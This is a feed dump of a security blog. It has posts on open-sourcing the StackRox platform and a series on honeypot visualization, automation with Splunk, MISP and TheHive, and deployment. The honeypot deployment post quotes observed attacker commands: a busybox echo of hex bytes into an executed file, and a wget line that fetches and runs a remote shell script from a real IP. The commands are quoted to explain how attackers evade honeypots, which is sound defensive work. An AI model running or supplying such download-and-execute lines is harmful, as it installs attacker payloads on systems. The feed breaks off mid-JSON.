Jekyll2022-10-14T11:10:00+00:00https://maddosaurus.github.io/feed.xmlSaurus Tech BlogHi there! Welcome to this pile of Malware Analysis, OSINT, CTF, ML, SOAR, Automation and more.How to Open Source Your Project (II)2022-07-26T09:00:00+00:002022-07-26T09:00:00+00:00https://maddosaurus.github.io/2022/07/26/stackrox-oss-ii<p>In part 2 of the OSS howto series, we take a look at Community, Collaboration, and Context (read <a href="/2022/07/25/stackrox-oss">part 1 here</a>).
<!--more--></p>
<h2 id="part-ii-community-collaboration-context">Part II: Community, Collaboration, Context</h2>
<h3 id="how-to-enable-healthy-discussion">How To Enable Healthy Discussion?</h3>
<p>As your audience grows, it is vital that you define clear rules to create a safe environment for everyone to participate. A common way of doing this is to define a code of conduct (CoC), which sets some basic guidelines on what kind of community interaction will not be tolerated. We decided to stick to well-established frameworks and based our CoC on the <a href="https://www.contributor-covenant.org/">Contributor Covenant</a>.</p>
<h3 id="how-to-keep-the-discussion-healthy">How To Keep the Discussion Healthy?</h3>
<p>The best CoC definition doesn’t help if there is no one there to enforce it. This meant we needed to find volunteers for a CoC committee and train them accordingly. The committee members should be publicly available and open for communication so they can be approached in case of any problems.<br />
Similar to handling responsible disclosure and CVEs discussed in part 1, I strongly recommend to not only have a CoC team in place, but also have them trained on CoC enforcement and communication in case they are newcomers.</p>
<p>We did this by publishing the CoC and the committee members on our <a href="https://www.stackrox.io/code-conduct/">community website</a>.</p>
<blockquote>
<p>As your audience grows, it is vital that you define clear rules to create a safe environment for everyone to participate.</p>
</blockquote>
<p>It is especially important to clearly communicate and enforce the rules you set up, as a safe environment fosters collaboration from your community.</p>
<h3 id="where-to-communicate-with-the-community">Where To Communicate with the Community?</h3>
<p>At this point, you should be aware of the goal of your open source go-live and the expected target audience. Answers to these questions shape how you interact with your community. Use all channels you have to reach out, but decide on one discussion medium out of the plethora available today, such as Slack, Discord, mailing list, forums or Matrix.</p>
<p>The StackRox community currently lives on the <a href="https://www.stackrox.io/slack/">CNCF Slack workspace in the channel #stackrox</a>.</p>
<h3 id="how-to-accept-contributions">How To Accept Contributions?</h3>
<p>Be clear and concise in what you accept from contributors. Is it only feedback in discussions? Do you accept issues or pull requests on GitHub? If so, it is recommended to provide guidelines in the form of a <code class="language-plaintext highlighter-rouge">CONTRIBUTING.md</code> document or Issue/PR templates to fill out.</p>
<p>If you decide to accept these, it also helps to give people a rough idea of your reaction times. Also, be sure to have processes in place to decide who keeps an eye on new items.</p>
<p>For example, we communicate that we aim to triage new issues and PRs within a week, with more detailed discussions and decisions communicated in our monthly meetings.<br />
That said, there is also the broader question whether you include community contributions in your downstream commercial verssion.<br />
There are many options how to do this. Check in with your Product Managers, Customer Support Team, and Legal department to make sure you don’t violate any license requirements and have unified messaging for public facing communication, for community and paid customers alike.</p>
<p>The StackRox team decided to accept community contributions, but clearly mark them as not supported by downstream Enterprise Support.<br />
While this adds a bit of management, as you need to keep track of two issue trackers (e.g. internal for downstream and GitHub for upstream), it fosters clear expectations for every involved party.</p>
<h3 id="how-to-meet-with-the-community">How To Meet with the Community?</h3>
<p>Regular public meetings lower the bar for participation and allow for issues to be raised efficiently. Any interested contributors can quickly stop by and get in touch with your project.</p>
<p>Currently, we run our StackRox Community meeting on the second Tuesday of each month at 9 a.m. PST, 12 p.m. EST, 5 p.m. GMT. You can subscribe to the events by adding the calendar [email protected] to your calendar.</p>
<p>In these meetings, we discuss and show demos of upcoming features, talk about open issues, present guides and how-tos, and have an open forum for Q&A with the community.</p>
<h3 id="conclusion">Conclusion</h3>
<p>There is a lot to consider when opening a big commercial project to a broader audience, but tackling this in an organized manner is worth the payoff - especially for the Eng team.<br />
As a final recommendation, please take the time to celebrate the go live with your team and make sure to pass any positive feedback to them!</p>In part 2 of the OSS howto series, we take a look at Community, Collaboration, and Context (read part 1 here).How to Open Source Your Project (I)2022-07-25T09:35:00+00:002022-07-25T09:35:00+00:00https://maddosaurus.github.io/2022/07/25/stackrox-oss<p>Transitioning a project from private to public development means more than just changing the visibility of the GitHub repositories. In part 1, we take a look at how your product and your team should guide your decisions.
<!--more-->
A version of this article was also published at <a href="https://thenewstack.io/how-to-open-source-your-project-dont-just-open-your-repo/">The New Stack</a>.</p>
<hr />
<p>On April 1 2022, the release of the StackRox Community Platform was announced.<br />
This is the result of a great deal of work by our team to transition StackRox’s proprietary security platform into an open source one.<br />
I’ve been working behind the scenes and want to share a bit of insight into the challenges that bigger projects might face when opening up.<br />
Transitioning a project from private to public development means more than just changing the visibility of the GitHub repositories. It is essential to have a transition plan, especially if the goal is to build a thriving community where users can grow and leverage the platform.<br />
To have the best chance of success, the project’s goals and the community’s goals should be as aligned as possible.<br />
For the StackRox team, one of our top goals was to set the entry barrier as low as possible for contributors and community users. I’ve personally found this to be a significant challenge.<br />
It is one thing to tailor your environment to engineers, hoping to provide a thorough and guided onboarding experience. Creating a forum for a greater community of developers, operational and security folks poses an entirely different challenge.</p>
<h2 id="part-i-your-product-and-your-engineering-team">Part I: Your Product and Your Engineering Team</h2>
<p>Before you make any decisions, you should be aware of your product and your team.<br />
Obviously, you should know both rather well, but you should also be aware of the broader context of your product and its role compared to competing products.<br />
Last but not least, you should answer the question of what you want to achieve with opening your platform.</p>
<ul>
<li>Are you interested in giving back to the community?</li>
<li>Do you want to grow trust in your product by exposing it to public scrutiny?</li>
<li>Are you interested in broader feedback or reaching a different user group?</li>
</ul>
<p>As soon as you have answered these questions, you can think about the next steps.</p>
<h3 id="what-to-open-source">What To Open Source?</h3>
<p>If you look at the <a href="https://github.com/stackrox">StackRox GitHub organization</a>, you will find a multitude of repositories with the platform comprising many different components and features that could be kept private. However, we chose to be thorough and take the extra time. We decided to open the complete platform and all its dependencies, including our out-of-the-box policy ruleset that we ship on new installations, prebuilt Docker images, and Helm charts to make the open source deployment as easy as possible.</p>
<p>I’ve been a strong proponent of opening the platform as-is instead of artificially removing parts of it, like predefined rulesets and alerts.<br />
As Kubernetes deployments are highly personalized to the needs of customers, the OOTB rulesets are a good starting point but are usually adapted to the environments’ needs sooner or later. As we wanted to lower the barrier of entry as much as possible, we wanted to ship the platform in its full state to give users a starting point right away.</p>
<h3 id="what-license-to-use">What License To Use?</h3>
<p>When opening your source code, one of the first tasks should be to select a license that fits your use case. In most cases, it is advisable to include your legal department in this discussion, and <a href="https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/licensing-a-repository">GitHub has many great resources</a> to help you with this process. For StackRox, we oriented ourselves on similar Red Hat and popular open source projects and picked Apache 2.0 where possible.</p>
<h3 id="how-can-people-access-it">How Can People Access It?</h3>
<p>After you’ve decided on what parts you open up and how you will open them, the next question is, how will you make this available?</p>
<p>Besides the source code itself, for StackRox, there are also Docker images. That means we also had to open the CI process to the public. For that to happen, I highly recommend you review your CI process. Assume that any insecure configuration will be used against you. Review common patterns for internal CI processes like credentials, service accounts, deployment keys or storage access.</p>
<p>Also, it should be abundantly clear who can trigger CI runs, as your CI credits/resources are usually quite limited, and CI integrations have been known to <a href="https://www.infoq.com/news/2021/04/GitHub-actions-cryptomining/">run cryptominers</a> or other harmful software.</p>
<h2 id="how-to-manage-it">How To Manage It?</h2>
<p>StackRox functions as an upstream public build, whereas Red Hat Advanced Cluster Security (RHACS) is built on an internal Red Hat build system. Tending to two different build pipelines naturally brings some overhead, as the open source and commercial flavors of this project each have different needs.<br />
In general, I would recommend against duplicating your build infrastructure, but sometimes it is inevitable. If you plan to distinguish your OSS and commercial versions, a lot of options are available.<br />
We found build time feature flags rather practical to manage differences between Upstream and Downstream.</p>
<p>If all goes well and your CI succeeds, you will most likely end up with some artifact — a release binary, tgz file or Docker image, which raises the next qestion:</p>
<h3 id="how-to-distribute-it">How To Distribute It?</h3>
<p>Making these artifacts publicly available to lower the barrier of entry is essential.</p>
<p>For StackRox, we decided to push built images to a <a href="https://quay.io/stackrox-io">public organization at Quay</a>. Alternatively, you can use GitHub’s release feature or other public distribution channels, depending on your release artifact type, such as NPM, PyPI, or Crates.<br />
I would recommend to use established channels as much as possible. If you are building a framework or library, language package managers should be your primary target. If you are building a product that needs deployment, consider publishing Docker images, as these are a well defined convenience that can be run everywhere - from local dev systems to enterprise-grade cloud Kubernetes deployments.<br />
In any case, you should not forget about potential external contributors. Your product most likely requires a very specific toolset to develop and build on. Consider migrating your dev environment in a container; not only for external contributors, but also for your Engineering team, to have a standardized dev environment.<br />
After distribution, the next step would be users downloading these artifacts and running your product. This brings us to the next important question.</p>
<h3 id="how-to-document-it">How To Document It?</h3>
<p>The project documentation is your public representation of the project, inviting users and contributors alike. Potential users will often consult your documentation first to gauge whether your project fits their use case and understand how to use it most efficiently. Documentation is ideally written to convey information to the community while minimizing user confusion and clarifying issues in your GitHub repository.</p>
<blockquote>
<p>Remember that documentation for operators and developers are two very different things.</p>
</blockquote>
<p>For example:</p>
<p>Operators are more interested in deployment, configuration, platform maintenance, data preservation, updates and disaster recovery.
Developers are interested in setting up a development environment (IDE, local deployment, debug builds, etc.) and getting access to detailed API descriptions.</p>
<p>Both target audiences profit heavily from “Getting Started” guides, be it how to get your first deployment up and running (operators), or how you accomplish everyday extension tasks in the codebase (developers).</p>
<p>Because StackRox is upstream of RHACS, we decided to focus our documentation efforts on developers, as quite a lot of user-tailored documentation is available. Open source-specific user documentation with StackRox branding is a project we’re planning right now, though.</p>
<p>Our developer-tailored documentation is being expanded in the <a href="https://github.com/stackrox/stackrox/blob/master/README.md">main projects’ README</a> and <a href="https://github.com/stackrox/dev-docs/">stackrox/dev-docs</a>. The latter is a collection of Markdown guides that initially started as private Confluence articles. This collection keeps growing, especially as we get more feedback from contributors on which guides they would like to see. It is also a continued effort to migrate additional guides and how-tos that might have been missed in the first migration, or that might not have been published because they contain private information.</p>
<h3 id="how-to-manage-privacy--nda-information">How To Manage Privacy & NDA information?</h3>
<p>Speaking of private information: Due to the nature of git, the complete history of your project will be public, starting with the first commit to the repository you publish. This also applies to any issues, discussions and pull requests that your project collected over time. While this is a non-issue for internal development, this can pose quite a problem when going public.</p>
<blockquote>
<p>It is heavily advised that you review all your issues and comments — on GitHub or other git repositories — and scrape the project’s git history, PRs, and Issues for any information or references not intended for public use.</p>
</blockquote>
<p>This information does not need to be public to be considered open source, but it does add context for future users and your own devs, so you might want to keep as much of it intact as possible.</p>
<p>A quick and easy way is to start with a new project on GitHub and do away with your git history. This poses multiple problems, however.</p>
<p>Your engineering team loses the history of their work, problem-solving and discussions, which are valuable resources. Furthermore, this step has to be planned well, and the engineering team must be in the know — if one person pushes their old git history to your new project, the complete history will be accessible again.</p>
<h3 id="how-to-handle-cves">How To Handle CVEs?</h3>
<p>Speaking of visibility: If you handle CVE/embargoed work, you will need a workflow in place. As your repository is public, you cannot simply use a public feature branch for this kind of work. For example, GitHub provides the option of <a href="https://docs.github.com/en/code-security/repository-security-advisories/collaborating-in-a-temporary-private-fork-to-resolve-a-repository-security-vulnerability">temporary private forks to resolve security issues</a>.<br />
Due to the time-sensitive nature of this topic, I would strongly recommend to have a process in place before you open your repository and, more importantly, make everyone aware of it. This includes Engineering as well as Engineering Managers and Management.</p>
<h3 id="how-to-take-care-of-our-people">How To Take Care of Our People?</h3>
<p>Last but not least: As already mentioned, in all of these tasks, you should take care to keep your engineering team involved and in the know at all times.<br />
Community and Collaborators are one thing, but your Engineering team are the folks that work full time on your product, so you should be wary to keep them happy and motivated.</p>
<p>The Red Hat Advanced Cluster Security (RHACS) engineering team works in a design-document-driven process, where all major changes are discussed between the whole engineering team through shared documents and discussions, written (document comments) and spoken (review meetings).</p>
<p>In the months leading to our announcement, we conducted many discussions and tried to find solutions, workflows and approaches that the team was happy with.</p>
<blockquote>
<p>As the engineering team will still be the main driver for the project, they should know what changes in their daily work once you go open</p>
</blockquote>
<p>Additionally, this is an excellent opportunity for initial external OSS contributions. If you maintain private forks with product-specific patches, this is the chance to shine by offering these changes to the original upstream projects.</p>
<p>For our engineers, little changed. They still work primarily in the upstream repositories, with the main difference that all pull requests and comments are now publicly visible. This change means that teams need to be mindful of how they communicate, even internally, as all comments can be read by external people who might lack the context or shared humor your team has.</p>
<p>Continue reading in <a href="/2022/07/26/stackrox-oss-ii">part 2</a>, where we take a look at the big C’s: Community, Collaboration, and Context</p>Transitioning a project from private to public development means more than just changing the visibility of the GitHub repositories. In part 1, we take a look at how your product and your team should guide your decisions.Honeypot Data Visualization & Automation2021-03-05T16:15:00+00:002021-03-05T16:15:00+00:00https://maddosaurus.github.io/2021/03/05/honeypot-viz<p>After we’ve taken a look at deploying honeypots and collecting their data, the next logical step is to visualize the plethora of collected logs.<br />
<!--more--></p>
<p>This is part 3 of a series detailing visualization, automation, deployment considerations, and pitfalls of Honeypots (<a href="/2020/06/19/honeypot-intro">Part 1</a>, <a href="/2020/11/24/honeypot-deyploment">Part 2</a>).<br />
An extended version of this article and an according talk can be found at <a href="https://vblocalhost.com/conference/presentations/like-bees-to-a-honeypot-a-journey-through-honeypots/">Virus Bulletin 2020</a>.</p>
<p>After successful installation and customization, the deployed Honeypots start generating data. One of the main challenges at this stage is sighting the logs and finding interesting events. Humans aren’t good at sighting big chunks of text; most people can grasp graphics much more quicky.<br />
Hence, having dashboards is a good way of getting a quick overview of what’s happening.</p>
<h2 id="sighting-data">Sighting Data</h2>
<p>The current state of our deployment is this: Logs over logs over logs.<br />
<img src="/images/logs.png" alt="Screenshot of 4 terminal windows filled with logs of different honeypots" /></p>
<p>As logs are not tailored for human consumption, they are notoriously hard to read and check. This is where visualizations come into play. The author recommends ingesting logs into a central system like Elastic or Splunk that indexes the generated data.<br />
Besides making all log data available for Dashboards, it also adds the advantage of making logs of all deployed Honeypots of your whole infrastructure available on a central system. This enables dashboard and report generation across the whole infrastructure and deeper insights.<br />
For the remainder of this paper it is assumed that all logs are collected in a central Splunk instance, which is also used for the shown dashboards.
Some key metrics the authors find useful for daily work are:</p>
<ul>
<li>Connecting Source IP</li>
<li>Number of different Source IPs in the last 60 minutes</li>
<li>Top 10 connection counts by Source IP</li>
<li>Username / Password pairs (failed & successful)</li>
<li>SHA256 hashes of captured payloads</li>
<li>List of executed commands (depending on Honeypot)</li>
<li>Unique connection identifiers (i.e. SSH keys or client version strings)</li>
</ul>
<p>Using Dashboards is no turnkey solution to better insights into produced log data. It lies still in the responsibility of the user to clean up data first before plotting it. In this context it is viable to consider lending <a href="https://www.kdnuggets.com/2018/12/six-steps-master-machine-learning-data-preparation.html">common dataset preparation procedures from the area of Machine Learning</a>. Some pointers can be the need for deduplication of events, i.e. multiple connections from the same source IP. Whilst in some scenarios this can be interesting, i.e. to find credential stuffing attacks, it can be counterproductive in others, like the absolute count of unique connections in a given timeframe.<br />
<img src="/images/splunk-noise.png" alt="Screenshot of a table consisting of files with different SHA256 hashes but the same filename" /><br />
Above screenshot shows an example for noise in a dashboard. The file <code class="language-plaintext highlighter-rouge">/tmp/up.txt</code> is generated with different content but is always written to the same path. While itself part of an evasion technique, it also fills up dashboards that show the latest found payloads. This is where filtering can help to keep dashboards effective by lowering noise. After validating that the created file is indeed noise, it can be filtered by its path. Nevertheless, the contents of this file might change as well as its importance. With the filter in place, this change might be overlooked easily. Therefore, continuous data analysis and pattern recognition are required to keep a dashboard valuable and usable.</p>
<h2 id="automating-workflows">Automating Workflows</h2>
<p>At this point the infrastructure consists of several running Honeypots that are producing data, which in turn is sent to a Splunk instance for indexing and dashboard generation.
Having a static dashboard with basic metrics is helpful for getting a grasp on the state of the infrastructure. If Honeypots are used in a more active scenario, i.e. for Threat Hunting, it is favourable to add common lookups and shortcuts to a dashboard to improve initial triage times. The proposed Splunk dashboard therefore contains contextual links to VirusTotal, Shodan and GreyNoise.<br />
<img src="/images/architecture.png" alt="Architecture diagram detailing the different honeypots, their data flow, and integrations to Splunk, MISP and TheHive." /><br />
All encountered SHA256 hashes are direct links to VirusTotal searches, clickable IP addresses refer to Shodan and Autonomous System Numbers (ASNs) are used as a lookup for GreyNoise. These services should provide enough information to decide whether a detailed investigation could lead to interesting insights.<br />
To further decrease the number of manual tasks, one can also consider the usage of Threat Intelligence Platforms like MISP which offer automated enrichment and analysis capabilities for submitted samples. Most Honeypots either already have API capabilities to upload Payloads to a target server or can be retrofitted to do so with little effort. In the showcased infrastructure, Cowrie is configured to query a MISP instance for the SHA256 hash of every encountered payload. If the payload is unknown, a new case is created in MISP and the payload is attached to it. If it was encountered before, a “sighting” event is added to the according case.<br />
The advantage of platforms like MISP is the community aspect and the integrated enrichment capabilities that can give samples and payloads context, IOCs, and analyses of other members of a sharing group. In the presented architecture, this role is fulfilled by a tandem of MISP and TheHive. TheHive is another TIP that focuses more on external integrations and analyzers. In its current state, every encountered payload is uploaded to MISP, followed by an automated case creation in TheHive. This enables analysts to run analyzers with little additional overhead, as they do not need to create case files and upload samples by themselves.<br />
This area of the proposed architecture can also be carried out by a Security Orchestration, Automated Response (SOAR) system to further automate responses and increase analytic capabilities.</p>
<h2 id="example-workflow">Example Workflow</h2>
<p>To illustrate the described system integration and workflows, we assume a file was uploaded to one of the Cowrie SSH Honeypots with the SHA256 hash of <code class="language-plaintext highlighter-rouge">69787a2a5d2e29e44ca372a6c6de09d52ae2ae46d4dda18bf0ee81c07e6e921d</code>. As a first measure of interest, this file can be investigated in the Splunk dashboard:
<img src="/images/links.png" alt="Splunk dashboard with breakout images showing previews of each linked service of the mentioned hash" /><br />
The dashboard already provides some valuable information on first sight. It can be derived that the payload was uploaded using the default credentials for a Raspberry Pi and the connecting address was located to Switzerland. By clicking on the hash or the IP address, either VirusTotal or Shodan can be checked for initial information. Last but not least, a click on the ASN leads to a GreyNoise query that lists all known systems in this ASN. This can add context to the IP as it gives pointers if the ASN is notoriously known for malicious traffic.<br />
After this cursory glance it is decided to further investigate this sample. Based on the information provided by Shodan and VirusTotal, the current working hypothesis is that this is a Bash IRC bot distributed by a system with a Raspberry PI SSH version string.<br />
As the payload was dropped on an integrated SSH honeypot, it has already been uploaded to a connected MISP instance where a new case has been created (or, in the case the payload already exists, a sighting has been added). The event already has the uploaded file attached as a malware sample including some additional metadata like common file hashes, the size in bytes and the entropy. From here on out, it is possible to make use of the MISP ecosystem to share and enrich encountered samples, for example through MISP Communities or MISP Community Feeds, as well as MISP plugins that integrate it with other products.
<img src="/images/misp1.png" alt="MISP overview of the case with all attached artifacts" /><br />
While the community aspect of MISP is its strong suit, there are other contenders regarding the effective use of integrations to 3rd party products. The tandem of The Hive and Cortex is an alternative that focuses more on said integrations. It consists of one or multiple Cortex instances that are responsible for running so called analyzers which are making use of several external services like IBM X-Force, RiskIQ Passivetotal, or HaveIbeenpwned. This is complemented by The Hive, which in turn offers case management, intel collection and templating capabilities.<br />
Additionally, MISP and The Hive can work in two-way-synchronization mode, which unites the strengths of both platforms into an excellent solution for managing, tracking, and optimizing investigations. For the example at hand this means that an incoming Alert for the discovered IRC bot is awaiting its import as a case in The Hive.
<img src="/images/hive.png" alt="Hive overview with results of different lookups" /><br />
The payload and all its observables from MISP are imported and available for use in Cortex analyzers. As these are run, they generate additional observables and reports that can be added to the case at hand, as can be seen in the screenshot. The red tags attached to the hash and the file stem from critical results obtained by querying IBM X-Force and VirusTotal. All added metadata can also be synced back to MISP for integrity and sharing purposes.<br />
At this point, an upload has been found and without opening the file itself, a preliminary examination was conducted which lead to the decision to further investigate the incident. The file was added to MISP and The Hive with minimal to no user interaction and made available to enrichment plugins and communities, therefore accelerating and improving the process of manual analysis and investigation.</p>
<h2 id="conclusions">Conclusions</h2>
<p>Successfully deploying and integrating Honeypots and supporting software into an existing infrastructure can be a daunting task that requires a decent amount of planning. Nevertheless, the advantages are evident:<br />
If integrated correctly, Honeypots enable faster alerting and a pre-emptive view into current attack strategies and automated attacks against publicly available infrastructure, whilst supporting integrations based on TIPs like MISP or The Hive speed up and improve the quality of Triaging and lower the amount of manual work done by Analysts. Combined with widespread log collection and well-designed Dashboards, this compliments better defensive strategies and measures against novel attacks.<br />
Especially with the continuous popularity of container-based virtualization technologies, high-interaction Honeypots are expected to gain popularity and development traction. As it stands, this type of Honeypots is considerably harder to detect, which makes it prone for usage in internet-facing deployments. This is due to the fact that the architecture mitigates most of commonly used evasion techniques simply by being a fully custom system that behaves consistently and as close to a real system as possible.<br />
Once deployed, Honeypots are a low maintenance asset that can bring high value to the table, be it as a pre-emptive alerting system for internal infrastructure or as a sensor for discovering ongoing campaigns and credential stuffing attacks, collecting value intelligence without manual interaction.</p>
<p>This concludes the series on honeypots. As a closing note, some resources can be recommended for getting started with custom deployments.<br />
A good overview of common resources and projects is the repo <a href="https://github.com/paralax/awesome-honeypots">awesome-honeypots</a> which can be of great service if a specific service or system is needed.<br />
First and foremost, an All-in-One solution that bundles multiple Honeypots with an Elastic stack, custom dashboards and a multitude of tools exist that is named <a href="https://github.com/dtag-dev-sec/tpotce">T-Pot</a>. This project is developed by Telekom Security and offers a quick start for the price of customization. As the project is rather complex and relies heavily on containers, customization of the bundled Honeypots is not as straightforward as it is in custom deployments. Nevertheless, it is an excellent starting point to get a feeling for deployments.<br />
A step closer to fully customized Honeypots are frameworks that abstract shared functionality between specific implementations. Examples are DutchSecs <a href="https://github.com/honeytrap/honeytrap">honeytrap</a> and <a href="https://github.com/Cymmetria/honeycomb">Cymetrias honeycomb</a>. Frameworks can speed up the development process of custom Honeypots but come with the price of predefined structure, as Frameworks rely heavily on conventions to work correctly.<br />
With the release of this paper, the presented Splunk dashboards are made available for general use and can be found <a href="https://github.com/CMSecurity/splunk-hp-dashs">in this repository</a>. This organization also holds repositories with the custom developed SMTP Honeypot <a href="https://github.com/CMSecurity/mailhon">mailhon</a> as well as an IP Camera Honeypot, <a href="https://github.com/CMSecurity/CameraObscura">CameraObscura</a>. Finally, the last project that is used in the demonstrated environment is an Android Debug Bridge Honeypot by the name of <a href="https://github.com/huuck/ADBHoney">ADBHoney</a>.<br />
Last but not least, <a href="https://www.honeynet.org/">Honeynet</a> has to be named as a central research organization that is dedicated to continued development of Honeypots as well as investigations into ongoing attacks.</p>After we’ve taken a look at deploying honeypots and collecting their data, the next logical step is to visualize the plethora of collected logs.Honeypot Deployment and Customization2020-11-24T18:00:00+00:002020-11-24T18:00:00+00:00https://maddosaurus.github.io/2020/11/24/honeypot-deyploment<p>Deploying Honeypots right is not always straightforward and leaves plenty of room for mistakes. Join me for a while to learn about deployment and customization of Honeypots.</p>
<!--more-->
<p>This is part 2 of a series detailing visualization, automation, deployment considerations, and pitfalls of Honeypots (<a href="/2020/06/19/honeypot-intro">Part 1</a>).<br />
An extended version of this article and an according talk can be found at <a href="https://vblocalhost.com/conference/presentations/like-bees-to-a-honeypot-a-journey-through-honeypots/">Virus Bulletin 2020</a>.</p>
<p>The first step to data collection, which is also the most important one, is the deployment of Honeypots. There are multiple pitfalls and recommendations to consider depending on the use case. After a successful deployment, the next step is to collect generated data and possible payloads at a single data sink to enable metrics generation and monitoring of the complete infrastructure.</p>
<h2 id="deployment-considerations">Deployment Considerations</h2>
<p>There are two main scenarios to consider when deploying Honeypots: Internal versus internet facing deployments. Both are valid scenarios but cover different use cases. For the remainder of this paper, we focus on internet-facing deployments for data collection if not further defined.
In an internal deployment, Honeypots can be considered as traps or alert systems. The idea is to deploy them throughout the company infrastructure, preferably near production servers. If an attacker is looking for a foothold in a network, they stumble upon these strategically placed systems and try to use them to persist access. Ideally, these Honeypots have been set up to raise alarms if incoming connections are detected, as there is no legit use for them in daily operations. This scenario can support existing measures like Intrusion Detection Systems or log monitoring as an active component to increase chances of early detection of intruders.<br />
Internet facing deployments on the other hand are more tailored towards collecting data on widespread attacks. This can range from basic information like attacked services (i.e. how common are attacks versus Android Debug Bridges) or used credentials up to detailed TTP information (i.e. which commands/scripts are executed, attempted lateral movement, persistency techniques and possible evasion attempts). In contrast to internal deployments, these are constantly exposed to world-wide traffic. Therefore, they are always to be considered compromised. As these deployments aim to provide no direct protection to an internal network, it is advisable to isolate internet facing Honeypots completely from production infrastructure.
<img src="/images/deployment.png" alt="Graphic that shows two sample deplyoments. The left is titled "Internal Deployment", showing the honeypot being placed next to production servers. The right is titled "Internet-facing Deployment" and shows the honeypot deployed in a DMZ, separated from all other infrastructure." />
Besides these specifics, we can also derive some general recommendations for all deployment scenarios.<br />
As these systems are considered insecure by design, it is advisable to treat them accordingly. Leaving production data or company information on them is inadvisable, as well as reusing usernames, passwords, certificates, and SSH keys. If attackers manage to escape from the Honeypot to the hosting OS, they are otherwise able to gain valuable information about internal infrastructure and active usernames.<br />
Furthermore, it is strongly advised to run Honeypot services as a non-root user that has minimal permissions and is not able to use sudo. In the case of Honeypot escapes this makes it considerably harder for attackers to escalate privileges. As most emulated services are running in the range of system ports which require elevated privileges, it is prudent to run them on non-system ports and utilize iptables forwarding rules to make them look like they are running on the system port.<br />
If Honeypots for common services like SSH and FTP are deployed, they should be running on the services’ default port. Especially for SSH as means of access for most systems, it is recommended to disable password authentication and root login for the real SSH server, as well as running it on a non-standard port to free up port 22 for the Honeypot. This also means that the creation of an SSH alias in local configs is recommended to avoid connecting to the SSH Honeypot by accident when conducting maintenance or applying configuration changes.<br />
Another consideration is the hosting service for the infrastructure. If it is not hosted on company-owned infrastructure, the idea of using a low-end VPS provider is compelling. Unfortunately, these are prone to being shut down in context of <a href="https://tech.slashdot.org/story/19/12/08/1549222/20-low-end-vps-providers-suddenly-shutting-down-in-a-deadpooling-scam">deadpooling scams</a>, so it pays to be prepared to loose these systems at any time. In general, automated deployments based on tools like Ansible or Puppet should be used for reproducible results and lower the risk of misconfigurations. Combined with a backup strategy for collected data, logs, and payloads this ensures resilience to data loss.<br />
Furthermore, it is recommended to minimize the usage of OS-based resources for the specific requirements of Honeypots. For example, the usage of local virtual environments for Python-based projects should be considered over using system-wide package installations to avoid dependency problems with multiple projects running on the same language or OS updates that break dependencies.<br />
Regarding operation, it is also advisable to monitor the regular operation of deployed Honeypots including storage utilization, ideally with automated tests tailored to the respective protocol.<br />
Generally speaking, you’re exposing a system to the world that looks vulnerable - it most likely is vulnerable, but in other ways than you’d think. Honeypot deployments, especially when internet facing, are an asymmetrical playing field with an attacker advantage. They have infinite ways and time to try attacks – the operator needs to conduct one mistake to expose the Honeypot host and possibly the surrounding network to attacks.<br />
Besides the deployment, there are more things to take into consideration. Attackers constantly try to detect Honeypots – with various techniques and varying success rates. A <a href="https://media.ccc.de/v/32c3-7277-breaking_honeypots_for_fun_and_profit">talk detailing finding flaws and their implications was held at 32c3</a>. In the upcoming section, some commonly encountered detection techniques and possible workarounds are presented. These are merely pointers in the right direction. It is advisable to monitor your Honeypot infrastructure constantly and keep an eye out for disconnects always happening after specific commands or workflows, as these can point to evasion strategies.</p>
<h2 id="custom-configurations">Custom Configurations</h2>
<p>Many Honeypots come with a default set of emulated parameters – including Hostname, service version, and credentials. This is especially common in low and medium interaction Honeypots. In the context of Honeypot configurations, customization is the key to evasion mitigation.<br />
As an example, the SSH Honeypot <em>Cowrie</em> is considered. If the default configuration is not changed, it used to accept the user <code class="language-plaintext highlighter-rouge">Richard</code> with the password <code class="language-plaintext highlighter-rouge">fout</code>, afterwards announcing that its system name is <code class="language-plaintext highlighter-rouge">svr04</code>. Checking for default configurations like these is relatively easy and therefore happens quite a lot.<br />
As a preventive measure, the footprint of the Honeypot should be as custom as possible. Especially announced hostnames, service versions and banners are low hanging fruit that can be changed. For low and medium interaction Honeypots it can also be a valid strategy to change outputs of emulated commands and create custom filesystem pickles to further make the system unique.</p>
<h2 id="finding-evasion-tactics">Finding evasion tactics</h2>
<p>As a general recommendation, monitor your Honeypots closely, especially in the early days of deployment, as they are “fresh” and unknown at this point. To stay on the example of Cowrie, it is possible to spot evasion techniques quite easily in the generated logs. In all cases the command workflow on the system is the same up until a specific point where commands either fail or are not executed at all. A commonly observed pattern of actors on the Cowrie SSH Honeypot is to echo the raw script into a file and trying to execute it subsequently.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@pot:~<span class="nv">$ </span>/bin/busybox <span class="nb">echo</span> <span class="nt">-en</span> <span class="s1">'\x00\x00\x00\x00\xb4\x03\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'</span> <span class="o">>></span> retrieve
user@pot:~<span class="nv">$ </span>./retrieve
</code></pre></div></div>
<p>This does not work on most low and medium interaction Honeypots, as they disown files created by the connected SSH user as soon as possible. As these files are now non-existent, the workflow of echoing the initial payload into a file and executing said file afterwards does not work on these Honeypots, therefore it can be considered a successful evasion.
Another evasion technique commonly encountered is to download the payload and execute it in a second command. As discussed, this approach leads to a successful evasion, as the file is not available to the user anymore at time of execution.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@pot:~<span class="nv">$ </span><span class="nb">cd</span> /<span class="p">;</span> wget http://45.148.10.175/bins.sh<span class="p">;</span> <span class="nb">chmod </span>777 bins.sh<span class="p">;</span> sh bins.sh<span class="p">;</span>
</code></pre></div></div>
<p>There are not many mitigations available to these issues. Due to the very nature of low and medium interaction Honeypots, the most viable mitigation is to switch to a high interaction system. High interaction Honeypots present a complete, persistent environment to an incoming connection that often is cached even through reconnects. This means that all dropped or downloaded payloads are available for execution instead of being snatched away by the Honeypot.</p>
<h2 id="sanity-checks">Sanity Checks</h2>
<p>Sanity checks are also encountered quite often. As an initial example an SMTP Honeypot is considered. Attackers will try to connect to a mail server and send a test mail to their own infrastructure to check if the mail server is allowing outbound mail traffic.</p>
<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
</span><span class="nl">"timestamp"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2020-06-14T08:57:00.854855"</span><span class="p">,</span><span class="w">
